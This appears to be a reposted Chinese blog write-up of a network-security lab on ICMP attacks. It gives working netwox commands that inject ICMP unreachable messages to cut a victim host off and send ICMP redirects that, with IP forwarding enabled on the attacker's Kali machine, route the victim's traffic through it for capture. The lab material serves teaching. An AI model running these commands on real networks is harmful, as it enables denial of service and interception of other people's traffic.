当前位置: 代码迷 >> 综合 >> HCIE(2)——ICMP攻击模拟
  详细解决方案

HCIE(2)——ICMP攻击模拟

热度:44   发布时间:2024-03-07 10:43:29.0

一、实验拓扑
在这里插入图片描述
二、拓扑介绍
局域网:172.24.8.0
攻击者kali:172.24.8.129
受害者win2003:172.24.8.253
PC2:172.24.8.254
外网主机:10.1.1.100

三、实验步骤
1)首先测试设备之间的连通性(win2003为例)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
2)ICMP不可达,实现win2003主机访问外网的时候都出现目标主机不可达的情况
即只需要做到win2003在访问172.24.8.2网关时出现主机不可达即可。
使用netwox 82号工具来实现(可以同时开几个终端来增强效果):

sudo netwox 82 -f "host 172.24.8.253"  -i "172.24.8.2"
-f:进行筛选
-i:目标地址

查看效果:
在这里插入图片描述
可以明显看到其中间断的出现了一些目标不可达的报文,说名实验成功。

3)ICMP重定向,实现当win2003访问外网时,需要先将报文交给攻击者kali后,再由kali转发到网关,最后再到外网主机。
实现这一目标,只需将将win2003的默认网关设为攻击者kali的主机地址即可,同时需要在kali上开启路由转发功能。
①开启路由转发功能

vim   /etc/sysctl.conf            //编辑sysctl.confnet.ipv4.ip_forward = 1     //设置为1
sysctl  -p /etc/sysctl.conf      //立即生效不需要重启
cat  /etc/sys/net/ipv4/ipv4_forward      //查看值是否为1,为1表示修改完成,为0表示没有修改

②使用netwox的86号工具来实现

sudo netwox 86 -f "host 172.24.8.253" -g "172.24.8.129"  -i "172.24.8.2"
-f:路由筛选
-g:新指定的网关地址
-i:原来的网关地址

在攻击者kali上面进行抓包,可以抓到ICMP重定向的包和要传输的数据包,也就是说,可以在kali上面获取从win2003发往外网的数据包。
在这里插入图片描述

实验成功!!!